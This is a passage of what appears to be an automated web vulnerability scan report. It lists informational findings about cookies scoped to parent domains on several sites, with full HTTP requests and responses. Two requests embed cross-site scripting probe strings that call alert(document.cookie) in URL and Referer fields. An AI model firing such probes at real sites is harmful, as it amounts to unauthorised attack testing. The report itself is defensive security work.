<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.115. http://media.fastclick.net/w/tre

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/tre

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=23189;evt=16009;cat1=19307;cat2=19308;rand=85918057 HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; vt=10070:256698:477674:54816:0:1295925050:3|11008:274624:511498:54393:0:1296265712:0|; pjw=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; adv_ic=ByAAAABBd0NNIAYGAAFJAAC2USAHIAtAAAHwceABFwH6XeABFwE+cqAXBEMAAPxI4AEXAGTgAi8Bq17gARfgAy8AaOACFwBh4AIvAZlQ4AEvAD3gAl8AsOACLwBY4AIv4ANH4AMvAeFZ4AFHAFbgAi8A5CDbwNfgAy8BAlvgARcAUOACLwSLXAAABEEEIAACHrNAgR8g7wCpIO8AYCATQAAATeACLwDVIC8AAkAUIAACvQ0/4AAvABsgjwB2IBNAAABL4AIvAdtX4AF3AErgAhcAGuACpwBB4AIXAD/hAgcAIOACFwB54AK/AB3gAhcAxeACLwAY4AIX4QNP4AMXAWU44AGPAVzVoO8giwBk4AIXAIvA1yAXBM1PAAADQNQgAABV4AIXAUdT4AFHACbgAhcAD+ACjwAD4AIXABjgAhcB/gyhNyBfAbda4AFHANzgAhcAxuACFwDY4AIXACjgAkcAxOACFwAV4AIXAKvgAhcBeUfAXwEAAA==; pluto=517004695355|v1

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:23:50 GMT
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: image/gif
Content-Length: 43
Set-Cookie: lyc=AQAAAAEAAIAAAZVagAdAAANsSwAA; domain=.fastclick.net; path=/; expires=Tue, 29-Jan-2013 01:23:50 GMT
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Tue, 29-Jan-2013 01:23:50 GMT

GIF89a.............!.......,...........D..;

16.116. http://metrics.hoovers.com/b/ss/hooverspaid-prod,%20hooversglobal-prod/1/H.19.4/s29599577935878

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.hoovers.com
Path:   /b/ss/hooverspaid-prod,%20hooversglobal-prod/1/H.19.4/s29599577935878

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/hooverspaid-prod,%20hooversglobal-prod/1/H.19.4/s29599577935878?AQB=1&ndh=1&t=29/0/2011%2019%3A54%3A52%206%20360&ns=hoovers&cl=63072000&g=http%3A//www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml%3F7ffa5%2522%253balert%28document.cookie%29//4d5eca5bcd1%3D1&r=http%3A//burp/show/25&cc=USD&ch=hoovers&server=hoovers.com&events=event2%2Cevent22&c1=7%3A30PM&v1=7%3A30PM&c2=Saturday&v2=Saturday&c3=Weekend&v3=Weekend&c4=paid&v4=paid&c8=500&v14=hoovers&c15=/global/mktg/index.xhtml%3Fpageid%3D13823%267ffa5&v29=burp&v31=Referrers&c48=New&v48=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=969&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.hoovers.com
Proxy-Connection: keep-alive
Referer: http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml?7ffa5%22%3balert(document.cookie)//4d5eca5bcd1=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HID=10.1.1.227.122391296352471936; s_cc=true; s_nr=1296352492087; s_ats=undefinedburpburpReferrersReferrers; ctc2=1

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:54:49 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26A26274851D2CD5-60000130C044F459[CE]; Expires=Tue, 29 Jan 2013 01:54:49 GMT; Domain=.hoovers.com; Path=/
Location: http://metrics.hoovers.com/b/ss/hooverspaid-prod,%20hooversglobal-prod/1/H.19.4/s29599577935878?AQB=1&pccr=true&vidn=26A26274851D2CD5-60000130C044F459&&ndh=1&t=29/0/2011%2019%3A54%3A52%206%20360&ns=hoovers&cl=63072000&g=http%3A//www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml%3F7ffa5%2522%253balert%28document.cookie%29//4d5eca5bcd1%3D1&r=http%3A//burp/show/25&cc=USD&ch=hoovers&server=hoovers.com&events=event2%2Cevent22&c1=7%3A30PM&v1=7%3A30PM&c2=Saturday&v2=Saturday&c3=Weekend&v3=Weekend&c4=paid&v4=paid&c8=500&v14=hoovers&c15=/global/mktg/index.xhtml%3Fpageid%3D13823%267ffa5&v29=burp&v31=Referrers&c48=New&v48=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=969&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Sat, 29 Jan 2011 01:54:49 GMT
Last-Modified: Mon, 31 Jan 2011 01:54:49 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www334
Content-Length: 0
Content-Type: text/plain


16.117. http://michaelwann.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://michaelwann.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: michaelwann.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:31 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=0c7ec67e6546a0d27335d16adf1ea700; expires=Sat, 25-Jan-2031 02:08:31 GMT; path=/; domain=.newsvine.com
Content-Length: 0
Content-Type: text/html
Connection: close


16.118. http://money.redacted/auto-insurance/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /auto-insurance/article.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /auto-insurance/article.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=c08717139d004559bd4f0225c985624e; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:48:12 GMT
Content-Length: 136393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l
...[SNIP]...

16.119. http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=4d8ce924396e4151b191c200b28be405; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:47:59 GMT
Content-Length: 81669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l
...[SNIP]...

16.120. http://money.redacted/currency/currency-clash-dollar-vs-euro-smartmoney.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /currency/currency-clash-dollar-vs-euro-smartmoney.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /currency/currency-clash-dollar-vs-euro-smartmoney.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=a96ec68b7d3a41e88ae91566940da75a; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:47:57 GMT
Content-Length: 70397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l
...[SNIP]...

16.121. http://money.redacted/identity-theft/default-dyn.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /identity-theft/default-dyn.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /identity-theft/default-dyn.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=8a19b1c37abe4adaa07e1fe54f2a83e1; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:48:03 GMT
Content-Length: 52097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l
...[SNIP]...

16.122. http://money.redacted/market-news/post.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /market-news/post.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /market-news/post.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=fc74895a2afe4dbb8b81357837158fa3; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:47:56 GMT
Content-Length: 43288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l
...[SNIP]...

16.123. http://money.redacted/mutual-fund/default-dyn.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /mutual-fund/default-dyn.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mutual-fund/default-dyn.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=78fc912bcfc74a00b174e74deda213d4; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:47:57 GMT
Content-Length: 60626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l
...[SNIP]...

16.124. http://money.redacted/saving-money/50-30-20-budget.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /saving-money/50-30-20-budget.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /saving-money/50-30-20-budget.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=4d2c950ddf854b40a5add97ca57f1813; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:48:06 GMT
Content-Length: 33106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l
...[SNIP]...

16.125. http://redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sat, 29 Jan 2011 23:48:16 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
pragma: no-cache
Location: http://moneycentral.msn.com/home.asp
Content-Length: 157
Content-Type: text/html
Set-Cookie: MUID=74239CED20224902AC862552C566F9F3; expires=Sun, 01-Nov-2020 07:00:00 GMT; domain=.redacted; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://moneycentral.redacted/home.asp">here</a>.</body>

16.126. http://redacted/detail/stock_quote

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /detail/stock_quote

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /detail/stock_quote HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Sat, 29 Jan 2011 23:48:21 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://investing.money.redacted/investments/stock-price
Set-Cookie: MUID=f1e153930f7d43c7a9fd16af4cdded3a; domain=.redacted; expires=Tue, 29-Jan-2013 23:48:21 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 171

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://investing.money.redacted/investments/stock-price">here</a>.</h2>
</body></html>

16.127. http://redacted/inc/Attributions.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /inc/Attributions.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/Attributions.asp HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:48:25 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Length: 26240
Content-Type: text/html
Expires: Sat, 29 Jan 2011 23:48:25 GMT
Set-Cookie: MUID=BBC5C4C59F664372B83E2469BBE8E1C0; expires=Sun, 01-Nov-2020 07:00:00 GMT; domain=.redacted; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<tit
...[SNIP]...

16.128. http://redacted/personal-finance/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /personal-finance/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal-finance/ HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 29 Jan 2011 23:48:20 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://money.redacted/personal-finance/
Set-Cookie: MUID=eeb0f31a74744b6db817f50168fe01ae; domain=.redacted; expires=Tue, 29-Jan-2013 23:48:20 GMT; path=/
Cache-Control: private
Content-Length: 0


16.129. http://movies.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 88675
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=8a183991ad5843ecb33290e9ed7a7542; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   MSN Movies
...[SNIP]...

16.130. http://movies.redacted/academy-awards/snubs/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /academy-awards/snubs/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /academy-awards/snubs/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43284
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=315a7361d2a9433cbd6de273a6f46301; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   2011 Acade
...[SNIP]...

16.131. http://movies.redacted/jason-statham/photo-gallery/feature/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /jason-statham/photo-gallery/feature/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jason-statham/photo-gallery/feature/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 38350
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=bd071d931c99456bbb919ea6d508c2bf; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   A Beginner
...[SNIP]...

16.132. http://movies.redacted/mom-pop-culture/tiger-mom-movie/story-feature/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /mom-pop-culture/tiger-mom-movie/story-feature/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mom-pop-culture/tiger-mom-movie/story-feature/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 48526
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=edacaf4cfdd14387b49aebcecaca1296; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Mom &amp;
...[SNIP]...

16.133. http://movies.redacted/new-on-dvd/movies/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /new-on-dvd/movies/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new-on-dvd/movies/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 48135
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=644af2bf6b11442a9276943bf18262ae; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Movies New
...[SNIP]...

16.134. http://movies.redacted/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /paralleluniverse/5-demonic-possession-movies/story/across-the-universe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /paralleluniverse/5-demonic-possession-movies/story/across-the-universe/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

